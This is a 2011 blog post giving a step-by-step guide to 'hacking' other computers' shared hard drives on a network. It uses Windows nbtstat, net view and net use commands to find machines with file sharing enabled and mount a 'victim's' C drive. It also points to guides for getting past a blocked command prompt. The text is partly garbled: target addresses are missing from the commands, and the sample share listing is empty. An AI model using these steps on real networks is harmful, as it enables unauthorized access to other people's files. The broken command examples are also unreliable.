Tuesday, April 19, 2011

NetWork hacking using DOS

In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt.

Things to remember

* CP = Command Prompt
* HDs = Hard Drives

Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this

NetBIOS Remote Machine Name Table

Name Type Status

user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.


NOTE - If you do not get this number there are three possible answers

A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.

B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\

Let's suppose we get the following output

Shared resources at \\
The computer's name will be here

Share name Type Used as Comment


The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\\CDISK

You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully

Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.

Continue to Hacking network printers with the command prompt


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